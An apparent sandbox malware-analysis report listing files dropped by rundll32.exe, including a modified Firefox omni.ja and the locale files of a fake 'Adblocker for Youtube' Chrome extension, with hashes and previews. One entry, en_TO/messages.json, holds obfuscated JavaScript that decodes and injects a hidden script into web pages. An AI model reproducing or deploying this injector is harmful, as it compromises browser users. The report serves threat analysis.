Preview:PK.........e.Y"y_.............icons/ficon128.png.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.

C:\Program Files\Mozilla Firefox\browser\omni.ja

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, made by v2.0 UNIX, extract using at least v1.0, last modified Wed Dec 19 21:00:48 2001, uncompressed size 74946, method=store
Category:dropped
Size (bytes):42504742
Entropy (8bit):5.623098227510791
Encrypted:false
SSDEEP:98304:Ss4U4Rdk80NRbMa2+p9D8k27H51mubWaJlcaTyC09E8JXboiIiVipxqS:Ud0vF9D8k27tyalnsXXgxj
MD5:71EF2AD1D467D621B2BDA9DD74AA30E6
SHA1:E0C0043354F8097FD172D58DCAEAE196D6A07EA6
SHA-256:FE1B62E3BEACBDC7566F823D03BAA6A7D089C4D5ADB4BE78BA8ED7EBA658309C
SHA-512:4F59C29406BD1DB5CE84876EE596F316AB355A598DB4BABC59DDA9A5699BE8A8DFE8E9E676C3CA88684CF0F2549F1F4FB19BCCB239FC57651F685401F41A605F
Malicious:false
Reputation:low
Preview:.DQ.PK............!<.j...$...$....................defaults/preferences/firefox.jsPK............!<....;...;...$.................defaults/preferences/firefox-l10n.jsPK............!<..}.........(.................defaults/preferences/firefox-branding.jsPK............!<....[...[... .............["..defaults/preferences/debugger.jsPK............!<..Y.H...H.....................chrome.manifestPK............!<.........................i/..chrome/chrome.manifestPK............!<#TS.#...#.................U6..components/components.manifestPK............!<............3..............9..chrome/browser/content/browser/built_in_addons.jsonPK............!<..!.O...O...-.............";..chrome/en-US/locale/branding/brand.propertiesPK............!<S...........=..............;..localization/en-US/browser/identityCredentialNotification.ftlPK............!<:./.........*..............?..localization/en-US/browser/screenshots.ftlPK............!<...\........&..............J..localization/en-US/browser/panelUI.ftlP

C:\Program Files\Mozilla Firefox\browser\omni.ja.bak

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, made by v2.0 UNIX, extract using at least v1.0, last modified Wed Dec 19 21:00:48 2001, uncompressed size 74946, method=store
Category:dropped
Size (bytes):42504668
Entropy (8bit):5.623098682895427
Encrypted:false
SSDEEP:98304:+s4U4Rdk80NRbMa2+p9D8k27H51mubWaJlcaTyC09E8JXboiIiVipxqS:4d0vF9D8k27tyalnsXXgxj
MD5:250D9B7A20B36C3662A25E4CC773AFED
SHA1:D5B0929628DFA373E90B8573606E7678FA6F36E3
SHA-256:D81A8A3BF247BC54EDC6F57689D62CD6F1DA75D17D6F0EEE4D9DA4A9A563798B
SHA-512:AB589D7DF354D3EFB7C77A7AB3B590F075D69BEB6A9195DF6A6C11C596EDFF8303FB5D2BB4F501D5DEC1D207A68A1409AAFC7932588877178BDFE5629D306EF1
Malicious:false
Reputation:moderate, very likely benign file
Preview:.DQ.PK............!<.j...$...$....................defaults/preferences/firefox.jsPK............!<....;...;...$.................defaults/preferences/firefox-l10n.jsPK............!<..}.........(.................defaults/preferences/firefox-branding.jsPK............!<....[...[... .............["..defaults/preferences/debugger.jsPK............!<..Y.H...H.....................chrome.manifestPK............!<.........................i/..chrome/chrome.manifestPK............!<#TS.#...#.................U6..components/components.manifestPK............!<E...........3..............9..chrome/browser/content/browser/built_in_addons.jsonPK............!<..!.O...O...-..............:..chrome/en-US/locale/branding/brand.propertiesPK............!<S...........=.............r;..localization/en-US/browser/identityCredentialNotification.ftlPK............!<:./.........*..............>..localization/en-US/browser/screenshots.ftlPK............!<...\........&..............I..localization/en-US/browser/panelUI.ftlP

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\am\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ar\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\be\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):204
Entropy (8bit):4.8508578194566825
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U30D50ogHfJf89abu/1:4dm1SlAeFUMT+EAI1
MD5:5A56E498EACF6CEED5F1C69EDAF05441
SHA1:96EB7F2EEF6D5EEB2D164FD289A7A70777E19E48
SHA-256:C381EAC12310F44DBB7E80C12B99B536173339063C004747587A826C5CE414E4
SHA-512:D1148843FD0D313491423FB1FCFA12511080AC91191609315B5B5CD34666534BCA0BD8A6FBD12584450447E39AE058FB6FB8E666AAAC00EB4AA18985612AE0C8
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... .......... .......... ... YouTube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bg\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bn\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ca\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.8038077324770025
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHATC6Wq8vEj/EXQ3YJMWVAVIQ2gBT1n:bk/dP6GtVR7s6kv3goJXW1
MD5:9558EF405369500EC74EC48B16C67123
SHA1:7A55A51AB242AAAB70B475CA244D58435ED18CDC
SHA-256:AFBC3A7F222C6C4AAC9BB72ACB89079751F1B26BCFB622AABFF3095D35E953C0
SHA-512:2FB9B297A00D30CD36C3881416360AB4C9305B148BAE4914F13C081713BF8FD921C9E8105EC1653BCB9258078509C5F425091B17482F5A7C633195DADEC59658
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Est.s buscant v.deo adblock? Pel descarregar Adblocker per a Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\cs\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):144
Entropy (8bit):4.942456752756783
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVXKd5gBBVR7WHNJcRAi2eCnngXR56WWVXKd5gBT1n:bk/dP6Gn24VR7MJcRAi3+gB56/2W1
MD5:524629E383646EE89AB2F678B4BE3FF6
SHA1:F0BDE6E032863D43AB147EFC39CAEF69FC9D7515
SHA-256:2D09BA1FD1682BE5630353AEF92E3EB7F6BF82FA6E86CF6EDB38102D2B6811E3
SHA-512:D4DFCED5F83A9E000DFA52A07E42BAD63E983E68FD9E9A32601E43F5EE4F5C0DB0050DDEC99847B5DFDF7A5DE9B32DF0DFCD5EE0F16591698B8CEBF7C57126D2
Malicious:false
Preview:.{"appName":{"message":"Adblocker pro Youtube."},"appDesc":{"message":"Hled.te video adblock? Tak.e st.hnout Adblocker pro Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\da\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.921700724720227
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWRMgFBBVR7WHA0algFkdCg1BKS9rIHWWRMgFBT1n:bk/dP6GVVVR7NgFsV1BKS9r69f1
MD5:F013F8F66453B7BB32ADFBAB94F43265
SHA1:6792CCC65AD371F2222FD11E3B994ECEB1376F7D
SHA-256:BC000154FEA83481537A4F9DBAB369970E83CA8335E52C451D9363C2BED20F45
SHA-512:85E835A25F47AA5C222264FB3ED65BAE37E7451C86BCBC634C4F145A1C58ED369321474CBA5FA9F1B10FD09370E399C24ACBFCE6C95BD81474F360B3F3AFF5F2
Malicious:false
Preview:.{"appName":{"message":"Adblocker til Youtube."},"appDesc":{"message":"Er du p. udkig efter video adblock? S. download Adblocker til Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):157
Entropy (8bit):4.946253849862891
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmZXizBBVR7WHWM1FaDEXgsvDM2KIEBpKGOWJFIHJKZWDmZXizL:bk/dP6GpVR7c1FCsLlKnOvHJKQ1
MD5:DE39EA44F2A12A934757A93C64251ACB
SHA1:61AFFEF1FC9FF528424F9147D6C056975092F233
SHA-256:66A7A4DE9D4A548E9109821EF598273032833B5644BF1157BF4045E9A14782B4
SHA-512:32052DFBE47177EDBE1181F91FD10FEB81EA00413D8090CDB52E048B3C605AB97AEB73B65624B4F5460DB47AF37513FCF076A2E4054C1DF3DEE21FBC2EEA6F62
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Sind Sie auf der Suche nach video-adblock? So laden Adblocker f.r Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\el\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):197
Entropy (8bit):4.9739986021611635
Encrypted:false
SSDEEP:6:bk/dP6GLAQhqb4VR7K6ITsfva9WlroZIAQhqbW1:4dFvIbYFE6roZIvIbW1
MD5:09A7A7CD38C78FF410EEDE8878408C74
SHA1:99D3EA931D32B960E3CEB71668C5A2184E14ADD1
SHA-256:F64C79D2C0340FDFD1355E5CF7402411E52DFD8C4E19B4F0D244A8E8DDFD64E8
SHA-512:05FBC49EA69B04175F594EB1A5EA684AA907D13C5651B9480393D75FEE7B060BE9CC83AAF908611DEB6EA8BB3862A591DF50356C21ECFC4BF6AE3142425D9BA4
Malicious:false
Preview:.{"appName":{"message":"Adblocker ... .. Youtube."},"appDesc":{"message":"....... ... ...... adblock; ...., ......... .. Adblocker ... .. Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GB\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TO\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):834804
Entropy (8bit):4.237070411495953
Encrypted:false
SSDEEP:6144:nWtlYGNPy3ymXZCfnvpn2qs7UoCheMANPCc3q6ep8ti31OXjNp:X1Hp
MD5:66BADF4B9C5657333475DDF4F2B1B1B9
SHA1:CFE66395CFD19FC37AA50E5286F06AB2F365835E
SHA-256:D37CCA62F722DD667CC8A6F66AC8EE0F41D761FD3E8890D1BD94DB54A999A978
SHA-512:A88B7DF97581E09C0E841DE79748AAC0B5F18EFFA598F1F9FD35906BE1560DCC3706E5FB41CB98ADD51354572EBCFFAD6688149A7D121F33F0A140A13283206C
Malicious:false
Preview:(function(){function _0x8853f7(){var _0x4267a3=function(_0x2b2cd9){var _0x4b9edf,_0x3875da;(_0x4b9edf=window['document'])&&(_0x3875da=_0x4b9edf['head']||_0x4b9edf['body']||_0x4b9edf['documentElement'])?(_0x4b9edf=_0x4b9edf['createElement']('script'),_0x2b2cd9=atob(_0x5ddcb(_0x2b2cd9)),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_1_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_2_','4366A976DB28476FA26AE30CEE10D605'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_3_','Windows NT 10.0; WOW64'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_4_','false'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_6_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_7_','true'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_8_','0'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_5_','https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wr'),_0x2b2cd9=new Blob([_0x2b2cd9],{'type':'text/javascript'}),_0x4b9edf['src']=URL['createObjectURL']

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_US\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):127
Entropy (8bit):4.783683649251908
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHKR1FTM2eC9owxJKZW8xBT1n:bk/dP6GeRVR7TpleYERj1
MD5:E47E22D7E235CDA9AB5CE8B0F4F1E1F8
SHA1:0ED41228E67650D4F5D84397EAC564BCF9F4788F
SHA-256:D66AF121A08B3CA39E89DD2B5630C9E62772CD8D12A025D5529BCD26C9D8589A
SHA-512:3D7F5B72B73362A3E4245051B8F4AF485FFF52BAD315F5C616D2C6C035C382757A8A21157FA8F54060F6AFD39197E39CFC902E9D806A40F46D39C24825CDE30C
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Otsid video adblock? Nii et lae Adblocker Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):133
Entropy (8bit):4.875948501246631
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHA5oOeC5bxsFW8xAR1n:bk/dP6GeRVR7LoOeRlS
MD5:DFB95328C33900FC5F0943DB17BB7A7B
SHA1:C52582635A8FA23E049B60986A1A78AA3DC90FED
SHA-256:9FE90EC988C0D089C7756146124CC656A56C9336AD7049456200817E1D597E32
SHA-512:6636562113F42AD7BE7998498287F78C956E2B595AB4BBEAF40D814BC10D9226AB073DD16E165A366A9BE16E76D9B54F23C7E600A65333ACE15EA15B172971FB
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Etsitk. video adblock? Joten lataa Adblocker Youtubeen.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):190
Entropy (8bit):4.840085778181825
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQ1UIlgQWxBBVR7WHTsEFXGXGCzEpAOFEqDjmovLFHJKJAHIlgQWxL:bk/dPME/bgQCVR7SlfepqHDxvL9JdOgV
MD5:460291C4926F8C24D245A74A76B88155
SHA1:6944B567438ACF86CBE6A6A3519DC84822B8B21B
SHA-256:33976589FF5232B39103D8A8E474F4044258DFA30AE667B90F176FA93C7E9AD2
SHA-512:11E9F61BF62BA6F0506D7C200079F7D41ED8A2BD644624551CF03880C517ED0748105307B20D493D15DEDE7DEEB76BEB9FF11ECA6C05E4E415227CF88D978614
Malicious:false
Preview:.{"appName":{"message":"Bloqueur de pub pour Youtube."},"appDesc":{"message":"Vous .tes . la recherche pour la vid.o adblock? Afin de t.l.charger bloqueur de pub pour Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
